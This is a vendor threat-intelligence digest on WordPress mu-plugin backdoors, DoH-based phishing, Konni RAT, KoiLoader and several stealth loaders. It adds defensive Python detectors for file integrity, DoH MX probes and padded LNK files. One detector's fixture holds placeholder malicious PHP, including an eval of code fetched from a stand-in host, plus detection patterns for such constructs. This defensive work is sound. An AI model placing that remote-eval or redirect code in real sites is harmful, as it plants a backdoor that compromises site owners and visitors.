Vercara’s Open-Source Intelligence (OSINT) Report – March 28 – April 3, 2025


Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.

NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.

Hackers Abuse WordPress MU-Plugins to Hide Malicious Code 

(TLP: CLEAR) Hackers are exploiting the WordPress Must-Use Plugins (mu-plugins) directory to execute malicious code on every page load while avoiding detection. This technique was first identified by Sucuri researchers in February 2025 and has been increasingly adopted by threat actors deploying three distinct payloads. The first payload, redirect.php, redirects visitors—excluding bots and logged-in admins—to a malicious website (updatesnow[.]net) that displays a fake browser update prompt designed to trick users into downloading malware. The second payload, index.php, is a webshell acting as a backdoor that fetches and executes PHP code from a GitHub repository, enabling attackers to remotely execute commands on the server, steal data, and initiate further attacks. The third payload, custom-js-loader.php, replaces all images on the site with explicit content and hijacks outbound links, redirecting users to popups and other shady content. The exploitation of mu-plugins is particularly effective because these plugins automatically execute on every page load without needing activation through the admin dashboard. Additionally, they are stored in the ‘wp-content/mu-plugins/’ directory and are not listed in the standard WordPress plugin interface unless the “Must-Use” filter is explicitly applied. This makes them an attractive target for attackers aiming for persistence and stealth. While mu-plugins have legitimate use cases, such as enforcing custom security rules or improving performance, their inherent design makes them prone to abuse. The discovered payloads are financially motivated and harmful to compromised sites. Beyond damaging a site’s reputation and SEO, the payloads attempt to install malware on visitors’ systems and provide attackers with the ability to conduct downstream attacks. The webshell backdoor is particularly dangerous due to its capacity for remote command execution and data theft. 
Although the exact infection vector remains unclear, Sucuri suspects attackers are exploiting known vulnerabilities in plugins, themes, or weak admin credentials. To mitigate these threats, WordPress administrators are advised to apply security updates to plugins and themes, remove or disable unnecessary plugins, and secure privileged accounts with strong passwords and multi-factor authentication. 

(TLP: CLEAR) Comments: The exploitation of WordPress’s Must-Use Plugins (mu-plugins) directory highlights malicious actors’ growing sophistication in leveraging under-monitored components for persistence. Mu-plugins are designed for essential site-wide functionality, running on every page load without activation, making them ideal for malicious actors seeking stealth. Their ability to execute before standard plugins makes them a prime target for establishing a foothold, even when security measures are in place. The use of diverse payloads, including redirections, webshell backdoors, and JavaScript hijacking, suggests a financially motivated operation aimed at credential theft, malware distribution, and SEO manipulation. This technique also resembles broader trends in CMS targeting, where malicious actors exploit inherent functionalities for persistence and monetization. As WordPress powers over 40% of all websites, malicious actors are likely experimenting with mu-plugins as a reliable compromise method. Defensively, traditional WordPress security plugins may not detect malicious mu-plugins unless specifically configured. Improving visibility through file integrity monitoring, enhanced logging, and manual reviews of the ‘wp-content/mu-plugins/’ directory is essential. This campaign underscores the need for administrators to be aware of unconventional attack vectors and enhance monitoring practices accordingly. 
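The comments above recommend file integrity monitoring and manual review of the mu-plugins directory. The following is an added example, not code from Vercara, Sucuri or BleepingComputer, of what such a check looks like in practice: it compares a snapshot of wp-content/mu-plugins against a stored SHA-256 baseline and flags PHP constructs that rarely belong in a must-use plugin. The baseline, the snapshot contents and the regex list are assumptions constructed for the example; the placeholder files mimic the behaviours the article describes (a visitor redirect and a remote-code fetch) without being real samples.

```python
import hashlib
import os
import re

# Constructed known-good snapshot: the mu-plugins directory as recorded at a
# trusted point in time (assumption: the operator stored this baseline off-host).
KNOWN_GOOD_FILES = {
    "site-hardening.php": (
        b"<?php\n"
        b"// legitimate mu-plugin: disables the dashboard file editor\n"
        b"define('DISALLOW_FILE_EDIT', true);\n"
    ),
}

# Constructed current snapshot: the same directory after a compromise of the
# kind described above. Payload bodies are placeholders, not real samples.
CURRENT_FILES = {
    "site-hardening.php": KNOWN_GOOD_FILES["site-hardening.php"],
    "redirect.php": (
        b"<?php\n"
        b"// constructed placeholder: sends non-admin, non-bot visitors elsewhere\n"
        b"if (!is_user_logged_in() && !preg_match('/bot/i', $_SERVER['HTTP_USER_AGENT'])) {\n"
        b"    header('Location: https://example.invalid/update');\n"
        b"    exit;\n"
        b"}\n"
    ),
    "index.php": (
        b"<?php\n"
        b"// constructed placeholder: runs whatever a remote host returns\n"
        b"eval(file_get_contents('https://example.invalid/stage2.txt'));\n"
    ),
}

# PHP constructs worth a manual look in a must-use plugin (assumed list).
SUSPICIOUS = [
    (re.compile(rb"\beval\s*\("), "eval()"),
    (re.compile(rb"\bbase64_decode\s*\("), "base64_decode()"),
    (re.compile(rb"\b(?:file_get_contents|curl_init)\s*\(\s*['\"]https?://"), "remote fetch"),
    (re.compile(rb"\bheader\s*\(\s*['\"]Location:", re.IGNORECASE), "redirect header"),
]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_baseline(files: dict) -> dict:
    """Map of relative path -> SHA-256, to be stored off-host for later comparison."""
    return {name: sha256_hex(content) for name, content in files.items()}


def suspicious_markers(content: bytes) -> list:
    return [label for pattern, label in SUSPICIOUS if pattern.search(content)]


def audit(files: dict, baseline: dict) -> dict:
    """Compare a snapshot against the baseline and flag risky PHP constructs."""
    report = {"added": {}, "modified": {}, "removed": [], "flagged": {}}
    for name, content in files.items():
        digest = sha256_hex(content)
        if name not in baseline:
            report["added"][name] = digest
        elif baseline[name] != digest:
            report["modified"][name] = digest
        markers = suspicious_markers(content)
        if markers:
            report["flagged"][name] = markers
    report["removed"] = sorted(set(baseline) - set(files))
    return report


def snapshot_directory(root: str) -> dict:
    """Read every .php file under root (e.g. wp-content/mu-plugins) into memory."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as handle:
                    files[os.path.relpath(path, root)] = handle.read()
    return files


def sample_report() -> dict:
    """Run the audit on the constructed snapshots above."""
    return audit(CURRENT_FILES, make_baseline(KNOWN_GOOD_FILES))


if __name__ == "__main__":
    for section, entries in sample_report().items():
        print(f"{section}: {entries}")
```

Against the constructed snapshot the audit reports redirect.php and index.php as files absent from the baseline and flags the redirect header in one and the eval()/remote fetch pair in the other, while the legitimate hardening plugin passes. In production, run snapshot_directory() on a schedule, keep the baseline somewhere the web server cannot write, and treat any "added" or "modified" entry in this directory as an incident until explained, since mu-plugins never need activation and do not appear in the default plugin list.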

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 6.4.1: “For public-facing web applications, new threats and vulnerabilities are addressed on an ongoing basis and these applications are protected against known attacks as follows:

  • Reviewing public-facing web applications via manual or automated application vulnerability security assessment tools or methods as follows:
    – By an entity that specializes in application security.
    – Including, at a minimum, all common software attacks in Requirement 6.2.4.
    – All vulnerabilities are ranked in accordance with Requirement 6.3.1.
    – All vulnerabilities are corrected.
    – The application is re-evaluated after the corrections.

  OR

  • Installing an automated technical solution(s) that continually detects and prevents web-based attacks as follows:
    – Installed in front of public-facing web applications to detect and prevent web-based attacks.
    – Actively running and up to date as applicable.
    – Generating audit logs.
    – Configured to either block web-based attacks or generate an alert that is immediately investigated.”

(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, can augment the effectiveness of your existing on-prem WAF investment by filtering out bad traffic from the public cloud before it reaches your network so you can reduce the overall traffic load on your on-prem devices. 
Source: https://www.bleepingcomputer.com/news/security/hackers-abuse-wordpress-mu-plugins-to-hide-malicious-code/ 

Phishing-as-a-Service Operation Uses DNS-over-HTTPS for Evasion 

(TLP: CLEAR) Morphing Meerkat is a sophisticated phishing-as-a-service (PhaaS) operation that has been active since at least 2020, employing advanced techniques such as DNS over HTTPS (DoH) and DNS MX record queries to evade detection. Discovered by researchers at Infoblox, the operation leverages a centralized SMTP infrastructure to distribute phishing emails impersonating over 114 brands, including Gmail, Outlook, DHL, and Maersk. Messages are crafted to prompt urgent action, often delivered in multiple languages to broaden the attack surface. The phishing process begins with the victim clicking a malicious link in a spoofed email, which redirects them through compromised ad tech platforms like Google DoubleClick. Using DoH via Google or Cloudflare, the phishing kit queries the victim’s email domain’s MX record to identify the email provider. Based on this information, a dynamically generated spoofed login page is displayed, pre-filled with the victim’s email address to enhance credibility. Credentials entered by the victim are exfiltrated to malicious actors via AJAX requests or Telegram bot webhooks, with an error message prompting re-entry to ensure accuracy. Finally, victims are redirected to legitimate authentication pages to reduce suspicion. Infoblox recommends enhanced DNS control to mitigate the threat, including blocking user access to unauthorized DoH servers and restricting access to non-critical infrastructure. 

(TLP: CLEAR) Comments: Morphing Meerkat’s use of DNS over HTTPS (DoH) and DNS MX record queries reflects a sophisticated approach by malicious actors to enhance phishing success and evade detection. By encrypting DNS queries via HTTPS, DoH bypasses traditional DNS monitoring systems, complicating detection efforts. Leveraging DNS MX record queries allows attackers to dynamically generate spoofed login pages tailored to the victim’s email provider, enhancing credibility and capture rates. The use of real-time credential forwarding via Telegram bots ensures rapid exploitation or resale of stolen credentials. The operation’s longevity since 2020 indicates its success in evading detection, likely due to exploiting under-secured platforms and leveraging compromised WordPress sites for redirection. Its multilingual phishing emails suggest a global targeting strategy and possible collaboration among multiple malicious actors. Defensive measures relying solely on conventional DNS monitoring will likely fail against these tactics. Effective mitigation requires inspecting HTTPS traffic for anomalous DNS queries, applying stricter controls over DoH, and blocking unauthorized access to commonly exploited ad tech platforms. Morphing Meerkat highlights the adaptability of malicious actors, underscoring the need for organizations to refine detection techniques and enhance monitoring systems to combat such evolving threats. 
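The comments above call for inspecting HTTPS traffic for anomalous DNS queries. As an added example (not code from Infoblox, Vercara or the article), the block below shows what that inspection looks like once a TLS-inspecting proxy records full URLs: it recognises requests to the Google and Cloudflare DoH endpoints named in the report, recovers the queried name and record type from both the JSON-style query parameters and the RFC 8484 base64url wire-format form, and isolates the MX lookups that are the fingerprinting step the phishing kit performs. The log format, the client addresses and victimcorp.example are constructed for the example; the endpoint list is an assumption that should be extended with whatever resolvers your environment permits.

```python
import base64
from urllib.parse import parse_qs, urlparse

# Public DoH endpoints named in the report (Google and Cloudflare) plus their
# well-known IP forms. Assumption: the proxy records full URLs, which requires
# TLS inspection; without it only the resolver hostname (SNI) is visible.
DOH_HOSTS = {
    "dns.google", "8.8.8.8", "8.8.4.4",
    "cloudflare-dns.com", "mozilla.cloudflare-dns.com", "1.1.1.1", "1.0.0.1",
}
DOH_PATHS = {"/dns-query", "/resolve"}
RRTYPES = {1: "A", 2: "NS", 5: "CNAME", 15: "MX", 16: "TXT", 28: "AAAA"}


def build_wire_query(name: str, qtype: int, txid: int = 0) -> bytes:
    """Minimal RFC 1035 query (header + one question); used only to construct sample traffic."""
    header = txid.to_bytes(2, "big") + b"\x01\x00" + b"\x00\x01" + b"\x00\x00" * 3
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.strip(".").split(".")) + b"\x00"
    return header + qname + qtype.to_bytes(2, "big") + b"\x00\x01"


def parse_wire_question(raw: bytes):
    """Return (qname, qtype) from the first question of a wire-format DNS message."""
    pos = 12  # skip the 12-byte header
    labels = []
    while raw[pos] != 0:
        length = raw[pos]
        labels.append(raw[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    qtype = int.from_bytes(raw[pos + 1:pos + 3], "big")
    return ".".join(labels), qtype


def normalize_type(value) -> str:
    if isinstance(value, int) or str(value).isdigit():
        return RRTYPES.get(int(value), str(value))
    return str(value).upper()


def doh_finding(log_line: str):
    """Parse one constructed proxy log line of the form '<ts> <client> <method> <url>'."""
    timestamp, client, _method, url = log_line.split(maxsplit=3)
    parsed = urlparse(url)
    if parsed.hostname not in DOH_HOSTS or parsed.path not in DOH_PATHS:
        return None
    params = parse_qs(parsed.query)
    if "dns" in params:  # RFC 8484 GET: base64url wire format without padding
        token = params["dns"][0]
        raw = base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))
        qname, qtype = parse_wire_question(raw)
    elif "name" in params:  # JSON-style API used by dns.google/resolve and Cloudflare
        qname = params["name"][0].rstrip(".")
        qtype = params.get("type", ["A"])[0]
    else:  # POST body: the URL alone does not reveal the question
        qname, qtype = None, None
    return {"time": timestamp, "client": client, "resolver": parsed.hostname,
            "qname": qname, "qtype": normalize_type(qtype) if qtype is not None else None}


def mx_probes(log_lines) -> list:
    """Findings where a client used DoH to look up an MX record."""
    findings = [f for f in map(doh_finding, log_lines) if f]
    return [f for f in findings if f["qtype"] == "MX"]


# Constructed sample log: one client fingerprints victimcorp.example via both
# resolvers, one browses normally, one resolves an A record, one uses POST.
_WIRE = base64.urlsafe_b64encode(build_wire_query("victimcorp.example", 15)).rstrip(b"=").decode()
SAMPLE_LOG = [
    "2025-03-31T10:14:02Z 10.0.0.23 GET https://dns.google/resolve?name=victimcorp.example&type=MX",
    f"2025-03-31T10:14:03Z 10.0.0.23 GET https://cloudflare-dns.com/dns-query?dns={_WIRE}",
    "2025-03-31T10:14:05Z 10.0.0.40 GET https://www.example.com/index.html",
    "2025-03-31T10:14:06Z 10.0.0.41 GET https://dns.google/resolve?name=www.example.com&type=A",
    "2025-03-31T10:14:07Z 10.0.0.42 POST https://cloudflare-dns.com/dns-query",
]

if __name__ == "__main__":
    for finding in mx_probes(SAMPLE_LOG):
        print(finding)
```

Two limits follow directly from the code: a POST-form DoH request carries the question in the body, so without body inspection the finding degrades to "this client used DoH" with no name or type, and a DoH server on a host not in the list is invisible to this check entirely. That is why the report pairs traffic inspection with blocking: a protective DNS layer that refuses to resolve resolver hostnames such as dns.google or cloudflare-dns.com stops the browser-side lookup before the encrypted query is ever made.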

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), supports 4 distinct detection engines to provide Defense in Depth against malware, phishing, and other abuses: 

  • The Lists Engine allows UltraDDR customers the ability to bring their own block lists and allow lists for FQDNs, domains, IP addresses, CIDR blocks, and registrars. 
  • The Categories Engine uses Vercara-provided Cyber Threat Intelligence feeds in 17 categories. Administrators can enable blocking on a category with just one button click. 
  • The Decision Engine uses a multi-petabyte adversarial infrastructure data lake and artificial intelligence techniques to determine if a previously unseen or recently changed domain is malicious in nature. 
  • The Ruleset Engine allows administrators the ability to build custom rules to augment and extend the other engines of UltraDDR. 

Source: https://www.bleepingcomputer.com/news/security/phishing-as-a-service-operation-uses-dns-over-https-for-evasion/ 

Konni RAT Exploits Windows Explorer to Launch a Multi-Stage Attack in Windows 

(TLP: CLEAR) The Konni Remote Access Trojan (RAT), linked to North Korean malicious actors, has evolved to exploit Windows Explorer vulnerabilities, allowing multi-stage attacks with enhanced stealth. Discovered by Cyfirma researchers during a targeted campaign against diplomatic entities in Southeast Asia, the malware leverages Windows Explorer’s file handling processes to establish persistence and execute malicious code undetected. The infection begins with spear-phishing emails containing malicious document attachments that trigger a DLL search order hijacking vulnerability. The malware places a malicious DLL where Windows Explorer loads it instead of the legitimate system file, exploiting the trusted process’s elevated privileges. Once established, the malware modifies the Windows Registry for persistence and injects code into legitimate processes to maintain control and evade detection. Konni RAT employs fileless techniques, living-off-the-land binaries (LOLBins), and encrypted command-and-control communications mimicking HTTPS traffic to obfuscate its activity. This evolution signifies a significant advancement in malware techniques, enabling malicious actors to maintain long-term access, escalate privileges, and exfiltrate sensitive data. Organizations, particularly in government, defense, and critical infrastructure sectors, are urged to implement strict application control policies, monitor for suspicious DLL loading, and deploy behavioral detection systems to identify such sophisticated exploitation attempts. 

(TLP: CLEAR) Comments: The latest evolution of Konni RAT demonstrates how malicious actors are exploiting Windows Explorer’s trusted processes to enhance stealth and persistence. By leveraging DLL search order hijacking, attackers achieve privilege escalation and evade detection by signature-based antivirus solutions. This technique reflects a broader shift toward fileless malware and living-off-the-land binaries (LOLBins), exploiting built-in Windows functionalities to remain undetected. Konni RAT’s use of spear-phishing to target high-value entities aligns with tactics commonly used by advanced persistent threats (APTs). Exploiting Windows Explorer allows attackers to bypass application whitelisting and endpoint detection systems by manipulating legitimate processes. Additionally, encrypted command-and-control communications mimicking HTTPS traffic make network-based detection challenging. The malware’s persistence mechanisms, including registry modifications and scheduled tasks, ensure long-term access and resilience against system reboots. The targeted nature of these attacks indicates that malicious actors are conducting reconnaissance to tailor their campaigns effectively. The ongoing evolution of Konni RAT underscores the need for organizations to implement behavioral detection systems capable of identifying abnormal DLL loading patterns and monitoring for unauthorized registry modifications. Improving visibility into legitimate processes and enhancing anomaly detection are essential to mitigate these sophisticated threats. 

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency #StopRansomware Guide: “Implement Protective Domain Name System (DNS). By blocking malicious internet activity at the source, Protective DNS services can provide high network security for remote workers. These security services analyze DNS queries and take action to mitigate threats—such as malware, ransomware, phishing attacks, viruses, malicious sites, and spyware—leveraging the existing DNS protocol and architecture.” 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations. 
Source: https://cybersecuritynews.com/konni-rat-exploit-windows-explorer/ 

New KoiLoader Abuses PowerShell Scripts to Deliver Malicious Payload 

(TLP: CLEAR) A new KoiLoader variant is leveraging PowerShell scripts embedded within malicious Windows shortcut (LNK) files to evade detection and distribute information-stealing malware like Koi Stealer. Discovered by eSentire, this campaign employs phishing emails impersonating financial institutions to deliver ZIP archives containing LNK files that exploit a Windows vulnerability (ZDI-CAN-25373) to hide command-line arguments. Once executed, the LNK file triggers a PowerShell command to download two JScript payloads, establishing persistence through scheduled tasks and executing further malicious activities. The malware uses techniques like process parentage alteration to disguise its presence, making detection by traditional endpoint security tools challenging. KoiLoader serves as a delivery mechanism for Koi Stealer, which exfiltrates credentials, cryptocurrency wallets, and sensitive data through encrypted HTTP POST requests. The malware also employs advanced obfuscation techniques, including API hashing and reflective code injection, to bypass security tools. This campaign highlights an evolving trend where malicious actors increasingly exploit living-off-the-land binaries (LOLBins) and obfuscated scripting to circumvent traditional detection mechanisms. Researchers recommend disabling wscript.exe via AppLocker, monitoring PowerShell logs, and deploying behavior-based detection solutions to combat such threats. 

(TLP: CLEAR) Comments: The latest KoiLoader variant demonstrates how malicious actors exploit living-off-the-land binaries (LOLBins) and obfuscation techniques to evade detection. By embedding PowerShell commands in LNK files and exploiting the Windows vulnerability (ZDI-CAN-25373) to hide command-line arguments, attackers bypass traditional security mechanisms focused on executable files. This technique’s stealthiness is enhanced by modifying process parentage and using scheduled tasks for persistence, mimicking legitimate system activity to avoid detection by endpoint detection and response (EDR) solutions. Leveraging API hashing and reflective code injection further complicates detection, as these methods are designed to evade both signature-based tools and static analysis. Encrypted HTTP POST requests for data exfiltration are another attempt to blend malicious activity with legitimate traffic, reducing the effectiveness of network-based monitoring. The deployment of Koi Stealer to harvest credentials, cryptocurrency wallets, and sensitive documents suggests a financially motivated campaign. Effective mitigation requires behavioral analysis rather than relying on signature detection. Disabling wscript.exe via AppLocker, monitoring PowerShell execution logs, and using EDR solutions capable of detecting anomalous script activity are critical steps to combat this evolving threat. 
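The article says the LNK files hide their command-line arguments via ZDI-CAN-25373 but does not describe the mechanism. Trend Micro's ZDI advisory for that identifier (not quoted on this page, so treat it as an external assumption) describes padding the shortcut's argument string with whitespace so the Windows properties dialog does not show it. The following added example, not code from eSentire, ZDI or Vercara, is a triage heuristic built on that description for mail-gateway or endpoint scanning: it verifies the Shell Link header (size 0x4C and the fixed LinkCLSID), then measures the longest run of UTF-16LE whitespace after the header. The threshold and the two sample shortcuts are constructed; the samples carry a valid header and a bare string rather than the full shortcut structure, since the heuristic does not parse past the header.

```python
import re

LNK_HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 as stored little-endian in the file
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# UTF-16LE encodings of the whitespace characters an argument string could be padded with
_UTF16_WS_RUN = re.compile(rb"(?:[ \t\n\x0b\x0c\r]\x00)+")


def is_lnk(data: bytes) -> bool:
    """True if the data starts with a well-formed Shell Link header."""
    return (len(data) >= LNK_HEADER_SIZE
            and data[:4] == LNK_HEADER_SIZE.to_bytes(4, "little")
            and data[4:20] == LNK_CLSID)


def longest_whitespace_run(data: bytes) -> int:
    """Longest run of consecutive UTF-16LE whitespace code units anywhere after the header."""
    body = data[LNK_HEADER_SIZE:]
    return max((len(m.group(0)) // 2 for m in _UTF16_WS_RUN.finditer(body)), default=0)


def assess_lnk(data: bytes, threshold: int = 64) -> dict:
    """Assumed threshold: no ordinary shortcut needs 64 consecutive blanks in any string."""
    valid = is_lnk(data)
    run = longest_whitespace_run(data) if valid else 0
    return {"is_lnk": valid, "max_whitespace_run": run, "suspicious": valid and run >= threshold}


def scan_file(path: str, threshold: int = 64) -> dict:
    with open(path, "rb") as handle:
        return assess_lnk(handle.read(), threshold)


def _fake_lnk(payload_text: str) -> bytes:
    """Constructed stand-in for a shortcut: real header, then one UTF-16LE string, nothing else."""
    header = LNK_HEADER_SIZE.to_bytes(4, "little") + LNK_CLSID
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))
    return header + payload_text.encode("utf-16-le")


# Constructed samples: an ordinary target path, a padded argument string, and a non-LNK file.
BENIGN_SAMPLE = _fake_lnk(r"C:\Program Files\Vendor\app.exe")
PADDED_SAMPLE = _fake_lnk(" " * 400 + "constructed-hidden-argument")
NOT_A_LNK = b"MZ" + b"\x00" * 100

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("padded", PADDED_SAMPLE), ("other", NOT_A_LNK)):
        print(label, assess_lnk(sample))
```

The benign sample's longest run is the single space in "Program Files"; the padded sample reports 400 and is marked suspicious; the non-shortcut is rejected at the header check so it never reaches the whitespace measurement. Because the regex runs over raw bytes it tolerates the odd-length structures that can precede the string data in a real shortcut, and the same scan is cheap enough to apply to every .lnk inside an inbound ZIP at the mail gateway, which is the delivery path the article describes.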

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency #StopRansomware Guide: “Implement Protective Domain Name System (DNS). By blocking malicious internet activity at the source, Protective DNS services can provide high network security for remote workers. These security services analyze DNS queries and take action to mitigate threats—such as malware, ransomware, phishing attacks, viruses, malicious sites, and spyware—leveraging the existing DNS protocol and architecture.” 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections. 
Source: https://cybersecuritynews.com/new-koiloader-abuses-powershell-scripts/ 

New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth 

(TLP: CLEAR) Hijack Loader, a malware loader first discovered in 2023, has evolved to include sophisticated evasion techniques like call stack spoofing and anti-VM checks to avoid detection and maintain persistence. The latest version also leverages the Heaven’s Gate technique for process injection and blocks specific antivirus processes such as Avast. Researchers from Zscaler noted the malware’s ability to conceal API and system call origins using fabricated stack frames, complicating detection and analysis. Additionally, Elastic Security Labs identified a new malware family called SHELBY, which uses GitHub as a command-and-control (C2) platform. Through DLL side-loading, SHELBYLOADER initiates communication with GitHub to retrieve encryption keys and decrypt payloads without leaving detectable artifacts. It employs sandbox detection techniques and executes commands by interacting with private GitHub repositories via Personal Access Tokens (PAT), making detection more challenging. Another loader, Emmenhtal (aka PEAKLIGHT), is distributing SmokeLoader through phishing emails with payment-themed lures. Emmenhtal uses .NET Reactor for obfuscation, aligning with trends in malware protection and anti-analysis mechanisms. These developments demonstrate an increasing sophistication among malicious actors using evasion techniques, legitimate platforms like GitHub, and enhanced obfuscation tools to complicate detection and achieve persistence. 

(TLP: CLEAR) Comments: The evolution of Hijack Loader, SHELBY, and Emmenhtal loaders demonstrates how malicious actors are enhancing tactics to evade detection. Hijack Loader’s adoption of call stack spoofing, which fabricates legitimate stack frames to hide malicious calls, complicates detection by signature-based and behavioral tools. Anti-VM checks further impede analysis by identifying and avoiding sandbox environments. SHELBY’s use of GitHub for command-and-control (C2) operations highlights the trend of exploiting legitimate platforms for malicious purposes. By embedding Personal Access Tokens (PAT) in binaries, SHELBY maintains persistence and facilitates seamless exfiltration. Leveraging GitHub’s infrastructure allows attackers to dynamically update payloads and retrieve command outputs, evading network anomaly detectors. Emmenhtal’s deployment of SmokeLoader using .NET Reactor obfuscation reflects an increasing reliance on commercial protection tools to hinder analysis. The adoption of Themida, Enigma Protector, and custom crypters further demonstrates a commitment to avoiding detection. These developments show a shift toward exploiting legitimate infrastructure, enhancing obfuscation, and using advanced evasion techniques. Effective defense strategies must focus on detecting behavioral anomalies, improving logging, and employing heuristic-based tools capable of identifying subtle deviations from normal operations. 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website category feeds. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using 4 distinct malware detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine if a domain is malicious before endpoints can be infected by them. 
Source: https://thehackernews.com/2025/04/new-malware-loaders-use-call-stack.html 

About Vercara. The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond. To learn more about Vercara solutions, please contact us.